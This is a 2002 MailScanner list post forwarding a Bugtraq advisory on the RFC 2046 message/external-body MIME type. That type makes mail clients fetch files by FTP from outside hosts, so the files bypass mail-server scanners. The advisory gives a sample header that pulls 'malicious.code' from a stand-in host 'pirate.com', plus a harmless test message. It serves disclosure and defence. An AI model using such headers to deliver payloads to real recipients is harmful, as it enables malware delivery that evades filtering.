Fwd: Another possible RFC 2046 vulnerability.
Tal Kelrich
tal at MUSICGENOME.COM
Fri Sep 27 19:06:58 IST 2002
just saw this on bugtraq... we should check for it
>Mailing-List: contact bugtraq-help at securityfocus.com; run by ezmlm
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq at securityfocus.com>
>List-Help: <mailto:bugtraq-help at securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe at securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe at securityfocus.com>
>Delivered-To: mailing list bugtraq at securityfocus.com
>Delivered-To: moderator for bugtraq at securityfocus.com
>Sender: tijojo at ensmp.fr
>Date: Fri, 27 Sep 2002 13:01:46 +0200
>From: Jose Marcio Martins da Cruz <Jose-Marcio.Martins at ensmp.fr>
>Reply-To: jose at ensmp.fr
>Organization: Ecole des Mines de Paris
>X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-3 i686)
>X-Accept-Language: fr-FR, en
>To: bugtraq <bugtraq at securityfocus.com>
>Subject: Another possible RFC 2046 vulnerability.
>X-Miltered: at paris by Joe's j-chkmail ("http://j-chkmail.ensmp.fr")!
>X-MailScanner: Found to be clean
>X-MailScanner-SpamCheck: not spam, SpamAssassin (score=1.6, required 7,
> TO_LOCALPART_EQ_REAL, DOUBLE_CAPSWORD)
>
>
>Hi,
>
>Some days ago, we're talking about RFC 2046 message fragmentation
>vulnerability.
>
>There is another related RFC 2046 vulnerability : message/external-body
>message type.
>
>RFC 2046 message/external-body MIME type allows to send messages not by
>it's content, but by reference.
>
>In this case, you can send a message with the following MIME tag :
>
> Content-Type: message/external-body; name="malicious.code";
> site="pirate.com"; mode="image";
> access-type=ANON-FTP; directory="pub"
>
>Client MUA, receives this and will get "malicious.code" file by
>anonymous ftp from pirate.com ftp server.
>
>RFC 2046 defines five access-types :"FTP", "ANON-FTP", "TFTP",
>"LOCAL-FILE", and "MAIL-SERVER".
>
>There are some other optional parameters to this feature. For example,
>if the message includes parameter permission="write", existing file will
>be overwriten.
>
>RFC 2046 says something about security in paragraph 5.2.3.6 :
>
> > (1) Accessing data via a "message/external-body" reference
> > effectively results in the message recipient performing
> > an operation that was specified by the message
> > originator. It is therefore possible for the message
> > originator to trick a recipient into doing something
> > they would not have done otherwise. ...
>
>Combining different access-types (mainly anon-ftp, mail-server and
>local-file) can create; IMHO, more complex attacks.
>
>What's interesting is that in this case the message and the malicious
>code passes through two different network paths : messages is sent by
>mail and the malicious code will be get by receiver by anonymous ftp.
>
>In the case of previous vulnerability (fragmented message), message and
>malicious code uses the same network path.
>
>Classical mail server virus scanners will never see the malicious code
>pass through it, as they will never have available entire malicious
>code.
>
>The only way to detect it, IMHO, at mail server, is by lexical analysis
>of MIME tags.
>
>Netscape Communicator 4.79 is compatible with this RFC 2046 feature.
>
>I can't say anything about others mail clients, as I'm sick at home and
>I have no access to other MUAs.
>
>Attached to this message you'll find a message sent using this feature
>and allowing you to get RFC 2046 by anonymous ftp. Maybe someone can
>check it out with Outlook and other popular MUAs. It's in the /var/mail
>format : you can append it to your mailbox and try it... 8-)
>
>References : RFC 2046 - MIME - Media Types
>
>Jose Marcio
>
>
>--
> -------------------------------------------------------------------
> Jose Marcio MARTINS DA CRUZ
> Ecole Nationale Superieure des Mines de Paris
> Centre de Calcul Tel . : 01.40.51.93.41
> 60, bd Saint Michel http://www.ensmp.fr/~martins
> 75272 - PARIS CEDEX 06 mailto:martins at cc.ensmp.fr>From
> martins at didi.ensmp.fr Wed Sep 18 10:40:02 2002
>Return-Path: <martins at ensmp.fr>
>Received: from didi.ensmp.fr (didi [10.5.5.101])
> by ticrobe.ensmp.fr (8.12.4/8.12.2/JMMC) with ESMTP id g8I8dLCi003339
> for <tijojo at adrian.ensmp.fr>; Wed, 18 Sep 2002 10:40:02 +0200
>Sender: martins at paris.ensmp.fr
>Message-ID: <3D88395A.AE13841F at didi.ensmp.fr>
>Date: Wed, 18 Sep 2002 10:29:14 +0200
>From: Jose Martins <martins at didi.ensmp.fr>
>Reply-To: tijojo at paris.ensmp.fr
>X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-3 i686)
>X-Accept-Language: en
>MIME-Version: 1.0
>To: tijojo at adrian.ensmp.fr
>Subject: tst attachment
>Content-Type: multipart/mixed;
> boundary="------------FA43411C8E35AC7F655DA077"
>X-Miltered: at ticrobe by Joe's j-chkmail ("http://j-chkmail.ensmp.fr")!
>Status: RO
>
>This is a multi-part message in MIME format.
>--------------FA43411C8E35AC7F655DA077
>Content-Type: text/plain; charset=us-ascii
>Content-Transfer-Encoding: 7bit
>
>
>RFC 2046 message/external-body compatibility test
>
>
>--------------FA43411C8E35AC7F655DA077
>Content-Type: message/external-body; name="rfc2046.Z";
> site="ftp.inria.fr"; mode="image";
> access-type=ANON-FTP; directory="rfc/rfc20xx"
>
>
>--------------FA43411C8E35AC7F655DA077--
More information about the MailScanner
mailing list